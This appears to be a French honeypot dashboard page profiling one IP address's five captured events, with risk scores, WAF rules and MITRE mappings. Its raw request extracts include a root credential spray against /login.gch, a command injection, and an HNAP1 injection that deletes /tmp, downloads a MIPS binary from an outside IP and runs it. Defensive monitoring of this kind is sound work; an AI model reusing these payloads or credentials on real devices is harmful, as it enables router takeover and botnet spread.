Profil de menace
Activité suspecte — risque 82/100 (Élevé) — MITRE T1059 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Période analysée : 2026-05-19 → 2026-06-18
Activité suspecte — risque 82/100 (Élevé) — MITRE T1059 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Activité suspecte — risque 82/100 (Élevé) — MITRE T1059 — confiance 100 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100%
Confiance 100 % — Score WAF 100 · Bonus corrélation +8 · 4 tag(s) WAF
ASN 37963 · 39.104.0.0/15 · APNIC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 5 événements sur la période pour cette IP.
Même FAI Hangzhou Alibaba Advertising Co.,Ltd. — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
5 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
5 événement(s) — page 1/1
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8083 · HTTP ALT 8083 | http-alt-8083 | http-alt-8083 http-alt-8083 · via HTTP ALT 8083:8083 · (sonde / probe) | Faible | Faible · 0 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
HTTP-ALT-8083
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8083
Chemin / cible
—
Service
HTTP ALT 8083
Pourquoi cette classification : Type « http-alt-8083 » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
|
|||||||
| TCP | 8083 · HTTP | http | Injection de commande cmd injection · via HTTP:8083 · (tentative d'exploit) · → /login.gch | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1059
TA0001
TA0002
Protocole
POST /login.gch UA r00ts3c-owned-you
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login.gch
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8083
Chemin / cible
/login.gch
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0145
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932200
CRS 932205
TeamSpeak3
Ligne de requête
User-Agent
r00ts3c-owned-you
Règles WAF
rce-0
rce-1
ssrf-3
nosqli-3
Payload (extrait)
POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: */* Frm_Loginto
Requête brute (extrait)
POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: */* Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST /manager_dev_ping_t.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: |
|||||||
| TCP | 8083 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8083 · (sonde / probe) · → /login.gch | Élevée | Moyen · 50 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1078
TA0007
TA0001
Protocole
POST /login.gch UA r00ts3c-owned-you
Émulateur
HTTP
WAF
7
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login.gch
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8083
Chemin / cible
/login.gch
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 50
Confiance : Confiance 100 % — 1 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
TeamSpeak3
Ligne de requête
User-Agent
r00ts3c-owned-you
Règles WAF
rce-0
Payload (extrait)
POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: */* Frm_Loginto
Requête brute (extrait)
POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: */* Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7. |
|||||||
| TCP | 8081 · HTTP ALT 8081 | http-alt-8081 | http-alt-8081 http-alt-8081 · via HTTP ALT 8081:8081 · (sonde / probe) | Faible | Faible · 0 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
HTTP-ALT-8081
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8081
Chemin / cible
—
Service
HTTP ALT 8081
Pourquoi cette classification : Type « http-alt-8081 » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
|
|||||||
| TCP | 8081 · HTTP | http | SSRF ssrf attack · via HTTP:8081 · (tentative d'exploit) · → /HNAP1/ | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1090
TA0001
TA0002
Protocole
POST /HNAP1/
Émulateur
HTTP
WAF
61
Recommandation
Investiguer
Tags
Cible HTTP
POST
/HNAP1/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/HNAP1/
Service
HTTP
Pourquoi cette classification : Règle WAF « ssrf-3 » · Motif SSRF · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — 10 tag(s) WAF
Protocole émulé
1
Signaux
Http Ssrf
Upstream
Waf Score
Technique MITRE
T1090
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932200
CRS 932205
LFI Double-dot bypass
Probe /HNAP1/
Ligne de requête
User-Agent
—
Règles WAF
sqli-19
rce-0
rce-2
ssrf-3
nosqli-3
sap-sapcontrol-headers
Payload (extrait)
POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * &
Requête brute (extrait)
POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://176.65.149.168/bins/kaizen.mips && chmod +x kaizen.mips;./kaizen.mips` Content-Length: 537 <?xml version="1.0" |
|||||||